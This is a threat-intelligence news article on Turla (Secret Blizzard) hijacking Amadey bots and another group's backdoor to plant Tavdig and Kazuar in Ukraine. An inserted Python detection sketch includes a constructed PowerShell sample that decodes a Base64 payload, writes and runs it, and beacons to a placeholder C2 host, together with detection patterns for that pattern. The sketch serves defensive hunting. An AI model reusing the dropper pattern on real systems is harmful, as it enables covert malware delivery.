Secret Blizzard deploys Kazuar backdoor in Ukraine using Amadey malware as a service

Posted by Admin, December 11, 2024
December 11, 2024Ravi LakshmananMalware / cyber espionage
The Russian nation-state actor tracked as Secret Blizzard has been observed using malware associated with other threat actors to deploy a known backdoor called Kazuar on target devices located in Ukraine.

The new findings come from Microsoft's threat intelligence team, which said it observed the adversary between March and April 2024 using the Amadey bot malware to download custom malware onto "hand-picked" systems linked to the Ukrainian military.

The activity is believed to be the second instance since 2022 in which Secret Blizzard, also known as Turla, has piggybacked on a cybercrime campaign to distribute its own tools in Ukraine.

“Commanding access to other threat actors underscores Secret Blizzard’s approach to diversifying its attack vectors,” the company said in a report shared with The Hacker News.

Other well-known techniques used by the group include adversary-in-the-middle (AitM) campaigns, strategic web compromises (aka watering hole attacks) and phishing.


Secret Blizzard has a track record of targeting various sectors to establish long-term covert access for intelligence gathering, but its primary focus is on foreign ministries, embassies, government agencies, ministries of defense and defense companies around the world.

The latest report comes a week after the tech giant, along with Lumen Technologies’ Black Lotus Labs, revealed that Turla had hijacked 33 command-and-control (C2) servers belonging to a Pakistani hacking group called Storm-0156 to conduct its own operations.

The attacks on Ukrainian entities involve commandeering Amadey bots to deploy a backdoor known as Tavdig, which is then used to install an updated version of Kazuar, a backdoor documented by Palo Alto Networks Unit 42 in November 2023.

Amadey-related cybercriminal activity, which frequently includes deploying the XMRig cryptocurrency miner, is tracked by Microsoft under the alias Storm-1919.


Secret Blizzard is believed to have either used Amadey malware-as-a-service (MaaS) or covertly accessed Amadey command-and-control (C2) panels to push a PowerShell dropper to target devices. The dropper contains a Base64-encoded Amadey payload, to which a code segment that calls out to a Turla-controlled C2 server has been appended.

“The need to encode the PowerShell dropper with a separate C2 URL controlled by Secret Blizzard may indicate that Secret Blizzard did not directly control the C2 engine used by the Amadey bot,” Microsoft said.

The next step involves downloading a custom reconnaissance tool to gather details about the victim device and possibly check whether Microsoft Defender is enabled, ultimately allowing the threat actor to focus on systems of further interest.

At this stage, the attack proceeds to deploy a PowerShell dropper that contains the Tavdig backdoor and a legitimate Symantec binary susceptible to DLL sideloading. Tavdig, in turn, is used to conduct additional reconnaissance and launch KazuarV2.
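The dropper pattern described above, a large Base64 blob that is decoded and executed alongside a separately hard-coded C2 URL, is something a defender can hunt for in PowerShell script-block logs. The following detection sketch is an added example, not code from the report or from Microsoft; the log entries, the `example.invalid` URL and the thresholds are constructed for illustration.

```python
import base64
import re

# Constructed sample script-block log entries (not real samples from the report).
# Entry 1 mimics the described dropper: a large Base64 blob decoded to disk and run,
# with a second hard-coded URL appended after the payload. Entries 0 and 2 are benign controls.
SAMPLE_SCRIPT_BLOCKS = [
    "Get-ChildItem C:\\Users -Recurse | Where-Object { $_.Length -gt 1MB }",
    "$p = [Convert]::FromBase64String('" + base64.b64encode(b"A" * 600).decode() + "');"
    "[IO.File]::WriteAllBytes(\"$env:TEMP\\svc.exe\", $p); Start-Process \"$env:TEMP\\svc.exe\";"
    "Invoke-WebRequest -Uri 'http://c2-placeholder.example.invalid/beacon' -UseBasicParsing",
    "$c = [Convert]::FromBase64String('SGVsbG8=');",
]

B64_RE = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")   # assumed threshold: 200+ chars
URL_RE = re.compile(r"https?://[^\s'\"]+")
DECODE_RE = re.compile(r"FromBase64String", re.IGNORECASE)


def _decodes(blob):
    """True if the blob is syntactically valid Base64."""
    try:
        base64.b64decode(blob, validate=True)
        return True
    except ValueError:  # binascii.Error is a ValueError subclass
        return False


def score_script_block(text):
    """Return the individual indicators found in one script block."""
    blobs = B64_RE.findall(text)
    return {
        "decodes_base64": bool(DECODE_RE.search(text)),
        "large_blob": any(len(b) >= 200 for b in blobs),
        "blob_decodes": any(_decodes(b) for b in blobs),
        "embedded_urls": URL_RE.findall(text),
        "drops_and_runs": bool(re.search(r"WriteAllBytes.*Start-Process", text, re.S)),
    }


def flag_suspicious(blocks):
    """Return indexes of blocks that combine decode, large blob and embedded URL."""
    hits = []
    for i, text in enumerate(blocks):
        ind = score_script_block(text)
        if ind["decodes_base64"] and ind["large_blob"] and ind["embedded_urls"]:
            hits.append(i)
    return hits
```

Combining the indicators keeps ordinary short `FromBase64String` usage (entry 2) from alerting while the embedded-payload-plus-URL shape (entry 1) is flagged for analyst review.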

Microsoft said it also discovered that the threat actor repurposed a PowerShell backdoor linked to another Russian hacking group called Flying Yeti (aka Storm-1837 and UAC-0149) to deploy a PowerShell dropper that embeds Tavdig.


The tech giant noted that the investigation into how Secret Blizzard gained control of the Storm-1837 backdoor or Amadey bots to download its own tools is ongoing.

Needless to say, the findings once again highlight the threat actor’s repeated reliance on other parties’ footholds, obtained by acquiring or stealing their access, to conduct espionage campaigns while concealing its own presence.

“It’s not uncommon for actors to use the same tactics or tools, although we rarely see evidence of them hacking and exploiting the infrastructure of other actors,” Sherrod DeGrippo, director of threat intelligence strategy at Microsoft, told The Hacker News.

“Most state-sponsored threat actors have operational objectives that rely on specialized or carefully compromised infrastructure to maintain the integrity of their operations. This is a potentially effective obfuscation technique to frustrate threat intelligence analysts and make it difficult to attribute the correct threat actor.”
